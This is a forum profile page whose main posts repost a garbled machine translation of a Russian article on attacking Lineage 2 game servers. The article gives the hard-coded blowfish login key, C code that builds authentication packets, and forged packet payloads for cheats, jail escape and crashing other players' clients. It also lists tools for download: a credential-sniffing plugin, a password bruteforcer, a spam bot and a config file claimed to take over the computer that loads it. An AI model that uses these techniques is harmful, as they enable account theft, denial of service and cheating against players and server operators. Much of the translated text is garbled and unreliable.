Jump to content

TofA

Members
  • Posts

    57
  • Credits

  • Joined

  • Last visited

  • Feedback

    0%

About TofA

Profile Information

  • Gender
    Not Telling

TofA's Achievements

Newbie

Newbie (1/16)

0

Reputation

  1. Hello, I would like to know how to remove HP/MP numbers displayed in the middle top of the screen. GMs on some servers want screen as a proof, that you are not using L2w and sometimes it's not possible to overpaint those numbers. Thank you.
  2. Im curious. Ive tried adding skills of BH to Scavenger and it didnt work. It seemed like you cant have skills of other profession... Looking forward to see your method
  3. Here, that the program has displayed: ----------------------- 0 1 1 0 1 1 0 1 1 0 0 0 0 0 0 1 0 1 0 1 1 0 0 1 1 1 0 1 1 1 0 0 0 1 0 0 0 1 0 1 1 0 0 0 0 0 0 1 1 1 1 1 0 1 1 0 1 0 0 1 29/31 Probability of success: 48.33 0 0 0 1 1 0 0 0 0 1 0 1 1 1 0 0 0 1 1 0 1 0 1 0 1 0 0 1 1 1 1 0 1 1 0 1 0 0 0 1 0 1 0 0 1 1 0 1 1 0 1 0 1 1 0 1 1 1 1 1 32/28 Probability of success: 53.33 1 0 1 1 0 1 0 1 1 1 0 1 1 1 0 1 1 0 0 1 1 0 1 1 1 1 0 1 1 1 0 0 0 1 0 0 1 1 0 0 0 1 0 1 1 0 0 1 0 1 0 0 1 0 0 0 0 1 0 0 31/29 Probability of success: 51.67 1 0 0 1 1 1 1 0 0 0 0 0 0 0 1 1 0 0 1 1 1 0 1 0 0 1 0 0 0 1 0 0 0 1 0 1 0 1 1 0 1 0 1 0 0 0 1 0 1 1 0 0 1 0 0 1 0 1 1 1 27/33 Probability of success: 45.00 Probability of success in the whole: 50.00 As you can see, those here are traced " types random " about which wrote f4llen that loss 0 both 1 equiprobably and no law here is present. Plus to all at intermediate measurements of probabilities (for everyone 60 numbers), the probability of success deviated 50 % a little, but the general all was equally as much as possible close to the valid probability of loss 0 or 1. Thus, statistics f4llen's that other, as attempt to systematize usual random. Well and last stone aside those who considers, that on probability of enchanting influences even weather behind a window: In L2j there is no generator of random numbers, in it same library randomizer, that has been used above. With that only a difference, that on probability of enchanting the unique number which is exposed by administration influences. Be are assured, in lineage2 off the same. As a result, I wish to tell, that it is not necessary to try to deceive rand (), more likely it will deceive you =) it is necessary to search for bugs in the process of a point, but besides as it has been shown above, it is too simple process to be bugged. And in general, " accidents does not happen, and there are only unknown to us laws " © Someone. 12. Geodate (circulation through walls). Today the person in %u0430%u0441%u044E was knocked and has started to argue, that l2j nothing differs from off server. In this connection I have decided to add in clause pair words about geodate in l2j and off. Process of movement on the world in la2 is realized interestingly enough. It appears, behind where to go watches both a server and the client in parallel. More precisely, you click in that point where wish to get, whether the client according to a geodate available it looks it is possible to pass there, if yes sends inquiry about a server. That already in conformity with the geodate resolves or returns you in a starting position. It just the phenomenon under the name " Invisible walls ", which, by the way, it is inherent to ours freeshared projects with curve locations also speaks. In l2j there is no geodate, it used to it in addition. What does it mean? And that movement char is watched only by the client on a geodate available it. Therefore, having taken advantage of a boat (in which clear business also is not present geodate), you can go through walls, because neither a server, nor the client (on behalf of a boat) simply do not know about them. This problem by the way not only l2j. On C1Off as a rule C3/C4 locations also without geodate, that is there it is exact also the responsibility for movement it is assigned only to the client. If to assort movement in more detail it is realized by a package " 0x01 MoveBackwardToLocation ". At it is present two sets of coordinates - where we cost and where we wish to get. After that package the server starts us to move to a point desirable by us step by step. And, with each step it does not send us new coordinates! That to the client to learn in what point at present it the package " 0x48 ValidatePosition " is, sent. That is, as a whole, we send a package with coordinates where we wish to get, and then simply periodically we check, roughly speaking, on how many we have promoted. But it so, for the general development, so to say =) 13. Jokes with SocialAction (0x1b) That such SocialAction, I think, to explain it is not necessary. There were, that besides laughter, greetings, victories and other, animation at LVL UP'Ñ is same SocialAction'. And, how much you know, the inquiry about product SocialAction is sent by the client, that is ourselves can make at any moment to itself lvlup =) Only animation, certainly. Here a format of a SocialAction-package: 1b // Type of a package (SocialAction) 0f 00 00 00 // number action' (0f - lvlup) 1 6.The bug with Ride (0x6a) Inquiry "Ride" is sent by the client when wishes to get on strider or vivern. A format: %u041A%u043E%u0434: 6a // the type of a package 00 00 00 00 // 0/1 climb down /climb 00 00 00 00 // number of the pets: 1 - strider, 2 vivern When at you it is caused strider and you send inquiry "Ride", actually, %u0441strider disappears (that is leaves game and loses the OID - it that when you from it climb down just speaks, it vanishes), and you sit down not so particularly on the strider, and on a certain standard striders:) it was incorrectly expressed a little, well all right. It has appeared, that on some La2-servers there is no check on that, and whether you caused in general %u0441%u0442%u0440%u0430%u0439%u0434%u0435%u0440%u0430 before on it to sit down. That is all of a sudden, having sent a package: 6a 01 00 00 00 01 00 00 00 you will sit down on strider though did not cause it. And, even if you do not have . In the same way it is possible sits down and on vivern. This bug, also as well as jokes with SocialAction has been found by the person under anybody Maddaemon. Snk to it. 15. We logout chars from game This bug I has opened casually, studying(investigating) all of the same mutants. One of thequestion why when at creation char you you specify nonexistent races (the number more 4), is always created charms with structures human's? And, this human cannot learn skills at NPC human's, that is anything except for its(his) structures with people did not unite. And so, it has appeared, that in the form of human'%u0430 such chars perceives _only_ %u04211/C3 clients. %u04214 for such chars a structure simply does not find and takes off with a mistake. That is, as soon as in a visibility range la2 C4 the client gets such charms, it falls. I mean a visibility range not that you see on the screen, and approximately a visibility range of "/target command. So, for example, having put such character near to the lock for a while siege, at attacking there will be no chance since boats to grasp the lock is extremely problematic, and the client to come into game they simply not can. I have tested it for three large domestic %u04214 servers (not l2j), everywhere worked. Such charms, by the way, it is possible to check characters on boats) If has not fallen, the boat means. But it is a way for GM-sadists . http: // m00.void.ru/nuke.rar - video record from one of Russian %u04214 servers. On it is shown, what effect is rendered with such charms on other players. 16. The bug with RequestRestartPoint (revival and escape from prison) This bug has been found by our compatriot from a underground www.allcheats.ru under anybody sshd. When you die, you have a window with a choice of a place where as though you to recover. Under usual conditions there only one button: " return to the nearest village ". After pressing on which game sends a package: %u041A%u043E%u0434: 6d // type of a package (RequestRestartPoint) 00 00 00 00 // the argument which actually speaks a server about where us to return the Bug consists that just the client speaks a server where to return %u0447%u0430%u0440%u0430 after death. That is, not the client, and we. LA2 C3/C4 servers support following values of argument (a place of return): 0 - return to town (in city) 1 - hide PK (if you the personal computer, returns in city of the personal computer or in a vicinity of that city where you have killed) 2 - to castle (in the lock) 3 - to siege HQ (to a flag during siege) 4 - fixed, festival (during festival of darkness recovers you on a place). Thus, having sent together " 00 00 00 00 "," 04 00 00 00 " we of charms will quicken on that place where has actually been killed. In this connection a bug, I had an idea on how it is possible to get out of prison of the character. For this purpose the charms, being prison, should be in a clan. This clan enters the name on siege and puts a flag, thus char which in prison should be killed somehow. On antaras.ru, for example, it is not complex, there around of prison aggression mobs, attacking through a wall. Further you simply send "RequestRestartPoint" a package with argument "03 00 00 00" and charms appears (should will appear:)) alive at a flag. 17. To undress the another's character not knowing neither a login, nor the password - unless it it is real? Yes, unfortunately it is real. I have decided to clean this paragraph from clause, as it very much serious a gap in lineage2 which still to more not few noise. I do not want, that it was on my conscience:) I Shall tell only, that there is an opportunity to enter under random characters (that is we cannot choose the concrete character, it does a server). Meanwhile it has been tested only on a known server www.l2extreme.com, but I am assured, that it works and on others. So be not surprised, if yours %u0447%u0430%u0440%u0430 with the password maby " 6IlZk9qR [!] " Suddenly will undress. 18. Result I have described sufficient guantitys in bugs. Unfortunately, by the moment of the publication of clause the majority of them became any more so are actual. That %u0430%u043A%u0442%u0443%u043B%u044C%u043D%u043E now or is at present in development, probably will be laid out later at a forum la2brute.5bb.ru. V. Bugs of new generation it [is cut out] I Can to tell only, that them will use my new ingame boat LA2Monster. VI. The Pair words about C4 In general C4 all still cannot stability in any way. A certain branching in realization of authorization is more precisely trite. L2J C4 servers began to apply to enciphering autorisation package RSA (however as well as off from NCSoft). And, the pair private/public-keys is generated for each connection. In the first package the server transfers the client a 1024-bit public key which the client _over _ blowfish ciphers a package with a login/password. This way guarantees that anybody from the outside cannot receive a client login and the password. Though if to recollect breaking Rc5-64 disclosing 128-byte a key not seems such empyrean. It would be desirable to note, that generation key-pair in RSA labour-consuming enough employment. At me on generation of pair keys by means of libraries openssl left ~1.5-2 seconds, that for a server with online, say, in 1000 person - inadmissible luxury. Though besides, the login-server on assignment NCSoft should be by other machine rather than a game-server, but as I already wrote above, it is not always carried out at us in Russia. As if to C1Off altered in æ4, RSA in them it is not used. Though work with internal identifiers which are used for authorization on a game-server is changed. Thus both for l2j and for C1Off-C4 the same is used æ4 the client. VII. An epilogue. Certainly, under this clause it is impossible to create RFC on lineage for, I passed naturally, some moments as they were not important or I up to the end did not understand their itself. Anyhow, I consider, that have given you a great lot of food for reflections. If you with something do not agree or know (think, that know:D) that I do not know, write on d4rk@securitylab.ru, or in %u041B%u0421 on www.allcheats.ru on nick "nop". I shall be glad to communicate. VIII. References. http://72.14.203.104/search?q=cache:Dt3Jo9GNJcJ:gamehaqs.com/forums/index.php%3Fshowtopic%3D5041+blowfish+lineage2*hl=ru*gl=ru*ct=clnk*cd=1 - kept in cache google bbs'¬á on which client-server interaction lineage was discussed. By posts, people persistently does not wish to look source codes l2j and tries to find at random a way to be authorized on a server. http: // forum.ragezone.com/server-help-extra/lin1-server-emulator-incomplete-cant-even-login-26438.html - the Same http: // allcheats.ru/forums/showthread.php? t=1844 - the same, only our Russian. Unlike american, have far promoted. http: // cheaters.net.ua/forum/index.php? s=083fef4f61997fc4be2ad3b0a98ba8a2*showtopic=254*pid=2254*st=0 and * entry2254 - clause F4llen'á about fake-Ý¡þá¡Ô and about types random (it was mentioned in this clause in the paragraph about sharpenings). http: // www.javable.com/columns/crypto/algorythms/01/-excellent section about blowfish. http: // arbuz.uz/z_pihns.html - interesting clause about calculation of number 3.14 proceeding from the theory of probability. So, for expansion of an outlook. http: // www.securitylab.ru/analytics/216301.php - my previous clause of similar subjects. It more simple due to intuitively-clear report HalfLife, I recommend beginners to begin with it. http: // la2brute.5bb.ru - the commercial project. http: // m00.void.ru/nuke.rar - video record - the appendix to paragraph 13 (It is thrown out from game chars) http: // la2brute.5bb.ru/viewtopic.php? id=52 - it is shown, how by means of LA2Fun to learn skills any level on %u043F%u0440%u043E%u0434%u0436%u0435%u043A%u0442%u0430%u0445 and to mix prof on l2j. http: // la2brute.5bb.ru/viewtopic.php? id=53 - it is shown how to create mutants (on an example immortal) on projects by means of LA2Fun. IX. Appendices to clause. The appendix to clause is to the address of: m00.blackhat.ru/la2shit.rar Contents: game-serv-encryption.txt - a source code on enciphering of packages by a game-server (spread sauron on allcheats.ru). grabber.c - an old example of uploading nickname from a site on an example www.antaras.ru. By the way, on antaras.ru already for a long time have entered cookie so this example already on it does not work. This code was mentioned in section about search of passwords. ID.rar - the list of subjects and corresponding them ID la2brute_1.1. OLD.rar - the old test version la2brute. It has been written in February-March of this year. Hangs, falls, so consider it PoC'«¼ =) la2reklamer.rar - the program for mass dispatch of messages. Itself download nickname players whom online and within a minute personally writes each of them the private message. raid.jpg - an example of how it is possible to use immortal mutants =) author Hint screenshot1.jpg - a sreen of the generator of auth-packages screenshot2.jpg - a sreen of teamwork of my patch for sniffit and bruteforce passwords to La2 to servers. shot1. JPG, shot2. JPG, shot3. JPG - sreens of the mutants created by means of la2fun sniff.exe - %u044D%u0445 from heart I tear off.. sniffer which to intercept and deciphers entering/proceeding la2-traffic. And and a login-server and a game-server. It is adjusted on my network interface so for use to you will have to rummage in a binary code =) mass.nuke.avi - record of how because of mine char from a server hundreds person fall. la2-example.c - an example of designing of RequestAuthLogin-package Sniffit. LA2C3.plug.rar - a plug-in for sniffit which allows to intercept another's RequestAuthLogin-packages and to pull out from them a login/password l2.crash.ini - the Ciphered file with adjustments for L2C3 the client from which it falls. At successful operation presumes to get full access to a computer on which this l2.ini has been used. la2fun_1.2.demo.rar - cut down LA2Fun 1.2. Can create mutants, immortal chars, chars without a head, learn skills any levels. And LA2Bute 1.5 (æ3/C4) I have decided to not spread last versions LA2Fun out of respect for those who bought them for money.. Also wished to lay out the linux-version la2brute, but something could not find:\ Special thanks h0snp, sshd and hint =) And also greetings Silence/EF;) and to the channel *m00 on irc.blackhat.ru © darkgrey / m00.blackhat.ru All credits for translation goes to CAHEK source http://www.clanlq.com/forum/viewtopic.php?p=2209
  4. I. introduction II. Login-server 1. Enciphering of packages 2. Structure of packages 3. The designer of RequestAuthLogin-packages on C III. Game-server. 1. Process of authorization on a server 2. Enciphering of packages 3. Report 4. xID and ObjectID 5. Examples of packages: a) buying up/sale b) private messages d) we speak with NPC on an example of learning skills IV. Problems and as it is possible to use them 1. Absence of a limit on quantity attempts of authorization 2. Enciphering of packages 3. The removed definition of the version lineage2 a server 4. Removed "suspension" of a login-server 5. Cloning 6. Creation of "mutants" and mixture скиллов 7. Immortality 8. ' remote DoS' also that gives it 9. integer overflow in a network cursor l2j 10. SQL-injection 11. Enchant (or a fairy tale about 100 % enchant) 12. Geodate (circulation through walls) 13. Jokes with SocialAction (0x1b) 14. A bug with Ride (0x6a) 15. We throw out from game chars 16. A bug with RequestRestartPoint (revival and runaway from prison) 17. To undress the another's character not knowing neither a login, nor the password - unless it it is real? 18. Result V. Bugs of new generation VI. Pair words about æ4 VII. An epilogue VIII. References IX. Appendices to clause I. Introduction. What is lineage? This is the representative of a modern game - MMORPG (Massively Multiplayer Online Role-Playing Game). I even would tell one of the most successful and popular, if not most =). Certainly, it is difficult to speak about popularity of this game since to count exact quantity "involved" in lineage, probably, it is impossible, but such servers as www.lineageii.ru (with as much as possible registered online in 10 000 person) and official www.lineage2.com (with all 100 000, that it paid) let know that the figure should be impressive. The essence of game consists that (as well as in any another RPG) you have a character and the huge world in whom need to be extracted money, clothes, the weapon, experience. Finally to fight with same as you players and to amuse the vanity victories. To some people at whom well it is not got on in any way real. To some people at whom well the real life is not got on in any way, it allows realisation in the virtual world - to become the known soldier and even to find the bride (yes, girls in lineage plays too much). Among all others online (and not only online) games, lineage bribes the graphics. Personally firstly it seemed to me improbable, that someone could create such wonderful three-dimensional beauty for simple game. But is at game and the dark parties(sides). First, it has property to tighten(delay). And not easier(simply) to tighten(delay), and to cause dependence from which it is the extremely complex(difficult) to struggle. Secondly, understand, in the industry in which turn hundred thousand игроманов from practically all layers of a society, business without money will not manage (as well as all in our life). In fact some people having family, work, simply do not have time for that months to pump over the character up to the necessary level. Such геймерская the layer has given birth persons who have started to sell game levels and things for real money, having created that to a new niche in the world lineage. At present, depending on size of a server (and рейтов), cost of well dressed character of a high level can vary from 300 $ (on dying www.antaras.ru) up to 5 000 $ on an official server. Most jokes-it is purchase of things at administration of this or that server. Ponder, the gamer pays N-th quantity(amount) of the killed raccoons for that the administrator has added 1 record in a database of game. Here is how make money of air. That, I something has taken a great interest in the description of game) Affect year, on it spent. Certainly, in the similar industry (where are twirled money and a cloud naive and, at times silly gamers) business without us - inquisitive minds- cannot manage. Someone buys characters, someone creates and pumps over itself, we choose the third, not blazed way. The matter is that for some years of existence of this game, in it has not been found not to one vulnerability (except for especially game bugs), for it has not been written not one program, which could open to malefactors access to another's accounts. And know why? It seems to Me, young, not skilled (which posts dazzles bugtraq) pushed away malicious enciphering packages in lineage. And, even in the deciphered kind, they represent a chaotic character set. Perhaps, old men remember my clause(article) about the report of client-server interaction and vulnerability Half-Life (www.securitylab.ru/analytics/216301.php). The purpose of that clause was to describe game and to give on a saucer almost everything that I have reached(achieved) in its(her) studying. In same clause I shall tell as to decipher traffic lineage2, I shall tell a little about features of the report, well and I shall give some operating time (as and another's), all rest I shall not publish, as general use of this can lead to chaos in this fine, balanced and quite generated virtual world =) ATTENTION. 1. At once I warn, I shall sometimes come back to article about half-life for analogies will help you to understand easier written. And to me to write easier. 2. Article was written on the basis of the analysis of the deciphered packages and studying of an initial code lineage2 a server l2j, written on java. Accordingly, article 100 of % is valid for l2j, and for official so, how much(as far as) l2j is valid for it =) 3. All source codes are written under linux. For compilation it is necessary lib blowfish. Libs from openssl package will approach at small updating a code. 4. By the way about updating a code. In the source codes given in article, there are small mistakes in logic to exclude their thoughtless use. If you will penetrate into article and fixing they will not be a problem. 5. And the last. The full version of article was accessible long time only to the limited number of people and with an exit с4 to the version lineage2 and fixs the majority of bugs sharply obsoletly. About С4 I shall tell a little in the end. II. A Login-server. Introduction. We shall begin that developers lineage2 have separated a login a server from game more less to unload and without that the hammered channel of a game server. Besides the login a server has property to hang (and, it has begun with с3 versions lineage and proceeds to this day) and to not start up users on a server. But those who already play, do not test absolutely any discomfort =) And owing to out all of the same gays which could find and distinctly explain to developers where all the bug has crept in, it remains till now not fixed. And so, not looking at all charm of idea with unloading the game channel, our domestic administrators persistently mould a login a server on one machine together with game. 1. Enciphering of packages. For enciphering packages which the login-server exchanges with the client, lineage uses blowfish. Yes, that algorithm which has been developed by Bruce Shnejerom in 1993. About blowfish it is important to know, that it is the symmetric block code. Symmetric - means, that the algorithm uses 1 confidential key by which data encrypt/decrypt will be decoded. And if to speak particularly about blowfish on the basis of this key are generated 18 32-bit keys and 4 matrixes in the size of 256 32-bit words everyone. By which data, in turn, encrypt.will be decoded. The block code - means, that blowfish processes given by blocks (on 8 bytes). And still it means, that if integrity шифротекста has been broken, we in a any way can restore a part. With reference to lineage, it is necessary to tell, that a key on the basis of which are generated connect, is a constant and it is precisely registered in source codes l2j (here on what 99 % of researchers lineage which assumed were strewed, that the key should be transferred in one of packages - see references in the end). Still it is important to note that the first 2 byte data of a package are not ciphered. With enciphering, I think, we have understood. We go further. 2. Structure of packages. First two byte a package (what are not ciphered) contain length of data of a package (as well as in halflife). The following byte bears in itself the information on type of a package. The login-server processes packages: 0x00 - RequestAuthLogin (the inquiry about authorization - contains a login and the password) 0x02 - RequestServerLogin (inquiry about call about a server) 0x05 - RequestServerList (inquiry about the list of servers) On the others it simply does not answer, leaving only record in broad gullies. The client processes packages of following types: 0x01 - authorization has not passed 0x03 - you are successfully authorized 0x04 - the answer on RequestServerLogin 0x06 - the answer on RequestServerList And also a little bit additional packages about a bath of an account, check of the version and тд - they are presented below. The following byte is additional to the above described inquiries. For example, if the server has answered us inquiry of authorization with a package of type 0x01, the following byte will contain the reason, on which authorization has not passed (for us are important: 0x03 - an incorrect login or the password, 0x07 - someone already use the account, 0x11 - is established the temporary password). But actually this byte any more absolutely service. For example, in RequestAuthLogin packages from it byte the login begins. Further there is ¡-th of byte which any more are not managing directors, and bear the information defined by type of a package. Well, for example, for "RequestAuthLogin" it is a field contains a login and the password. The important applicability the last have of 8 bytes of a package. They contain checksum all that goes up to them, except for besides first two bytes of a package. What image calculates this most checksum? From data 32-bit words are serially separated. The first XOR with the second. Result of this operation XOR with a following word and so on. The example of calculation checksum will be shown below. 3. The designer of packages on С. With structure of packages we have understood, now it is possible to realize in programm everything, that was manual above. Код: /* la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor Helps to understand lineage2 authentification. darkgrey / m00.blackhat.ru ~broken */ #include "/usr/local/include/blowfish.h" // length key #define KEY_LEN 20 // Length RequestAuthLogin of a package is constant and equal AUTH_PKT_LEN + 2 #define AUTH_PKT_LEN 0x30 // Key on the basis of which are generated sub-keys (connect) char key[] = "[;'.]94-31==-&%@!^+]"; // Structure bfkey which after generation sub-keys will contain 18 P sub-keys and 4 S matrixes BF_KEY bfkey; // Function which calculates checksum and inserts it into a package int add_ckecksum(char *raw, int count) { long chksum = 0L; int i = 0; long ecx; for(i = 0; i < count; i += 4) { ecx = raw; ecx |= raw[i + 1]; ecx |= raw[i + 2]; ecx |= raw[i + 3]; chksum ^= ecx; } printf("checksum: 0x%x\n",chksum); memcpy(raw+count, (char *)&chksum, 4); } // Adds a login and the password in a package (it is separated from the basic function from reasons readable) int add_lp(char *raw, char *l, char *p) { l[15] = '\0'; p[17] = '\0'; memcpy(raw+3,l,strlen(l)); memcpy(raw+17,p,strlen(p)); } // Displays a package in a readable kind (for debugging) int print_packet(char *raw, int len) { int i, c = 0; for(i=0;i<54;i++) printf("_"); for(i=0;i<len+2;i++) { if((c % 0x10)==0) printf("\n0x%.2x | ", c); printf("%.2x ",raw & 0xFF); c++; } printf("\n\n"); } // The main function which designs a package int build_auth_packet(char *login, char *pwd) { int count = AUTH_PKT_LEN / 8; int i; char packet_skeleton[] = // packet skeleton RequestAuthLogin "\x32\x00" // The length of a package is constant and equal 0x30 + 0x02 "\x00" // Type of a package (0x00 - RequestAuthLogin) "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // login "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // password "\x08" // Means the end of section login/password "\x00\x00\x00\x00\x00\x00\x00\x00" // in c3 not used(зарезервированно?) "\x00\x00\x00\x00" // checksum "\x00\x00\x00\x00"; // add login and pass to packet add_lp(packet_skeleton, login, pwd); // add checksum add_ckecksum(packet_skeleton + 2, AUTH_PKT_LEN - 8); printf("Auth packet dump (non-crypted):\n"); print_packet(packet_skeleton, AUTH_PKT_LEN); // We cipher blocks on 8 bytes for(i = 0; i < count; i++) BF_encrypt((BF_LONG *)((short*)&packet_skeleton+1+i*4), &bfkey, BF_ENCRYPT); printf("Auth packet dump (encrypted):\n"); print_packet(packet_skeleton,AUTH_PKT_LEN); } int main() { char login[] = "m00", // test login pwd[] = "ownzu"; // password printf("\nla2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor\n\n"); // generate sub-keys BF_set_key(&bfkey, KEY_LEN, key); // We collect a package build_auth_packet(login, pwd); } /* eof */ Here that on my boxing the program has displayed: bash-2.05b$ ./a.out la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor checksum: 0x224a0377 Auth packet dump (non-crypted): ______________________________________________________ 0x00 | 32 00 00 6d 30 30 00 00 00 00 00 00 00 00 00 00 0x10 | 00 6f 77 6e 7a 75 00 00 00 00 00 00 00 00 00 00 0x20 | 00 08 00 00 00 00 00 00 00 00 77 03 4a 22 00 00 0x30 | 00 00 Auth packet dump (encrypted): ______________________________________________________ 0x00 | 32 00 09 d9 97 e2 29 89 8c b5 1a a0 1a 83 74 43 0x10 | 39 fc 2f 03 c3 26 9c 65 b0 c4 20 28 11 c1 6a 95 0x20 | 3e 44 45 46 2a ae b9 18 91 2e 75 56 d0 dc 40 b5 0x30 | 77 2a bash-2.05b$ III. A Game-server 1. Process of authorization on a login-server and call on a game-server. Authorization on a login a server occurs in some stages. 1) a login the server sends us a greeting in the form of a package in length of 11 bytes (in general it contains the information on the version). 2) we answer it RequestAuthLogin with inquiry 3) if the password true, sends us a package with 32 bit number of our account (it always constant) - we shall call SessionKey *1. 4) we send it RequestServerList, on what the server answers us the list of servers containing game, ports, number of playing users, the maximal number of users. 5) we send RequestServerLogin, on what the server checks ours AccessLevel (if it is equal-1, means we banned) and depending on our login, the password, a level of access and a socket, generates unique 32-bit SessionKey *2 on which in a consequence we will be authorized with a game-server. If the game server in down, simulates this condition (administrators do it for work on a server) or is simply full, refuses to accept us. 6) if all is good, we climb on a game server. We send it a certain package (for everyone C3 a server it the, but constant), on what it answers 12 byte with a package containing first 4 bytes of key which it is fastened to others 4 bytes (which are constant) and is received 64 a bit key. In the further we shall use it for decoding and coding game packages. It is important to note, that with everyone of races coded a package, its length increases to the first part of a key. 7) we send it a login and two identifiers (already in the ciphered kind) which we have received in a session with a login-server. In the answer we receive the list of characters. Here so, in 7 stages we shall be authorized on a server =) Difficultly, but it is safe. Probably, someone from you had a question: and whether probably to come on a game server directly? Without participation a login of a server. About it I shall write below. 2. Enciphering packets As I already wrote enciphering of packages above, for enciphering game packages lineage uses a 64-bit key. The first it 4 byte undertake from the very first package of the game-server, the second. N-th symbol from a clear text, XOR's with N-th byte a key further undertakes. In parallel with it XOR's (N-1)-th symbol from a clear text on 0xFF. Above results of both calculations operation " digit-by-digit And " is spent. And on such algorithm each symbol since the first is ciphered. As you can see, as each subsequent symbol will be ciphered, depends from previous. And it means, that if at us the first part of a package is for whatever reasons damaged, or it simply is not present, decipher the second part we cannot. Well it so, to a word. Actually it for us is not important. Still it is important to note that the first part of a key variable. With each new deciphered package, to the first I 4 byte the length of these to data increases. That is, having an initial key (at the moment of connection with a login a server) and, having pulled out a package during the certain moment from a session with a game-server decipher it we cannot. For this purpose we need to restore all packages which were up to it. Basically, quantity of possible combinations of a key of equally ~423 million. In view of simplicity of algorithm, modern computers can make somewhere 10 000 iterations in a second (can even more) and to find a key a maximum for 12 hours. But for this purpose we need to know even about the maintenance of a package. For what authors have made a key to variables? I think, all it is clear, with a view of safety. Though, it is a question about TCP (instead of about UDP as in the same halflife) in which someone stranger "to put" in a session extremely inconveniently. 4.Protocol. As well as in packages of the login-server, first two byte are allocated towards the length. Further the byte means type of a package. Here on types of packages which the client lineage2 (should process C3 the some people I shall make comments): Код: // sends a login-server 0x01 loginfail2 0x02 accountKicked1 0x03 loginok 0x04 serverlist 0x05 serverfail 0x06 playfail 0x07 playok 0x08 accountKicked 0x09 blockedAccMsg // banned 0x20 protocol version different 0x00 VersionCheck // Sends a game-server 0x01 MoveToLocation 0x02 NpcSay 0x03 CharInfo // Means surrounding characters 0x04 UserInfo 0x06 Attack 0x07 Attack 0x08 Attacked 0x09 Attacked 0x0a AttackCanceld 0x0b Die 0x0c Revive 0x0d AttackOutOfRange 0x0e AttackInCoolTime 0x0f AttackDeadTarget 0x10 LeaveWorld 0x11 AuthLoginSuccess 0x12 AuthLoginFail 0x13 CharList // The chars list 0x15 SpawnItem // On the some people C3 the answer to a choice char 0x16 DropItem // On the some С3 transfers info about mob 0x17 GetItem 0x18 EquipItem 0x19 UnequipItem 0x1a StatusUpdate 0x1b NpcHtmlMessage // To the some people C3 transfers the list clothes with ItemID and them ObjectID 0x1c SellList 0x1d BuyList 0x1e DeleteObject 0x1f CharSelectInfo 0x20 LoginFail 0x21 CharSelected 0x22 NpcInfo 0x23 NewCharacterSuccessPacket 0x24 NewCharacterFailPacket 0x25 CharCreateOk 0x26 CharCreateFail 0x27 ItemList 0x28 SunRise 0x29 SunSet 0x2a EquipItemSuccess // Has become outdated 0x2b EquipItemFail // Has become outdated 0x2c UnEquipItemSuccess // Has become outdated 0x2d UnEquipItemFail // Has become outdated 0x2e TradeStart 0x2f TradeStartOk // Has become outdated 0x30 TradeOwnAdd 0x31 TradeOtherAdd 0x32 TradeDone 0x33 CharDeleteSuccess 0x34 CharDeleteFail 0x35 ActionFail 0x36 ServerClose 0x37 InventoryUpdate 0x38 TeleportToLocation 0x39 TargetSelected 0x3a TargetUnselected 0x3b AutoAttackStart 0x3c AutoAttackStop 0x3d SocialAction 0x3e ChangeMoveType 0x3f ChangeWaitType 0x40 NetworkFail // Has become outdated 0x43 CreatePledge 0x44 AskJoinPledge 0x45 JoinPledge 0x46 WithdrawalPledge 0x47 OustPledgeMember 0x48 SetOutPledgeMember 0x49 DismissPledge 0x4a SetDismissPledge 0x4b AskJoinParty 0x4c JoinParty 0x4d WithdrawalParty 0x4e OustPartyMember 0x4f SetOustPartyMember 0x50 DismissParty 0x51 SetDismissParty 0x52 MagicAndSkillList 0x53 WarehouseDepositList 0x54 WarehouseWithdrawalList 0x55 WarehouseDone 0x56 ShortCutRegister 0x57 ShortCutInit 0x58 ShortCutDelete 0x59 StopMove 0x5a MagicSkillUser 0x5b MagicSkillCanceld 0x5d CreatureSay 0x5e EquipUpdate 0x5f StopMoveWithLocation 0x60 DoorInfo 0x61 DoorStatusUpdate 0x63 PartySmallWindowAll 0x64 PartySmallWindowAdd 0x65 PartySmallWindowDeleteAll 0x66 PartySmallWindowDelete 0x67 PartySmallWindowUpdate 0x68 PledgeShowMemberListAll 0x69 PledgeShowMemberListUpdate 0x6a PledgeShowMemberListAdd 0x6b PledgeShowMemberListDelete 0x6c MagicList // Has become outdated 0x6d SkillList 0x6e VehicleInfo 0x6f VehicleDeparture 0x70 VehicleCheckLocation 0x71 GetOnVehicle 0x72 GetOffVehicle 0x73 TradeRequest 0x74 RestartResponse 0x75 MoveToPawn 0x76 SetTo 0x77 StartRotating 0x78 FinishRotating 0x79 MoveBackwardToLocation // Is available in view of skill or to_the_nearest_village after death 0x7a SystemMessage 0x7d StartPledgeWar 0x7e ReplyStartPledgeWar 0x7f StopPledgeWar 0x80 ReplyStopPledgeWar 0x81 SurrenderPledgeWar 0x82 ReplySurrenderPledgeWar 0x83 SetPledgeCrest // Has become outdated 0x84 PledgeCrest 0x85 SetupGauge 0x86 ShowBoard 0x87 ChooseInventoryItem 0x89 MoveToLocationInVehicle 0x8a StopMoveInVehicle 0x8b ValidateLocationInVehicle 0x8c TradeOtherAdd2 0x8d TradePressOwnOK // Has become outdated 0x8e MagicSkillLaunched 0x8f FriendAddRequestResult 0x90 FriendAdd // Has become outdated 0x91 FriendRemove // Has become outdated 0x92 FriendList // Has become outdated 0x93 FriendStatus // Has become outdated 0x94 TradePressOtherOk // Has become outdated 0x95 FriendAddRequestResult2 0x96 LeaveWorld2 0x97 AbnormalStatusUpdate 0x98 QuestList 0x99 EnchantResult 0x9a AuthServerList // Has become outdated 0x9b PledgeShowMemberListDeleteAll 0x9c PledgeInfo 0x9d PledgeExtendedInfo 0x9e SurrenderPersonally 0x9f Ride 0xa1 PledgeShowInfoUpdate 0xa2 ClientAction 0xa3 AquireSkillList 0xa4 AquireSkillInfo 0xa5 ServerObjectInfo 0xa6 HideGm 0xa7 AquireSkillDone 0xa8 GMViewCharacterInfo 0xa9 GMViewPledgeInfo 0xaa GMViewSkillInfo 0xab GMviewMagicInfo 0xac GMViewQuestInfo 0xad GMViewItemList 0xae GMViewWarehouseWithdrawList 0xaf PartyMatchList 0xb0 PartyMatchDetail 0xb1 PlaySound 0xb2 StaticObject 0xb3 PrivateSellList2 0xb4 PrivateBuyList2 0xb5 PrivateStoreMsg 0xb6 ShowMinimapPacket 0xb7 ReviveRequest // 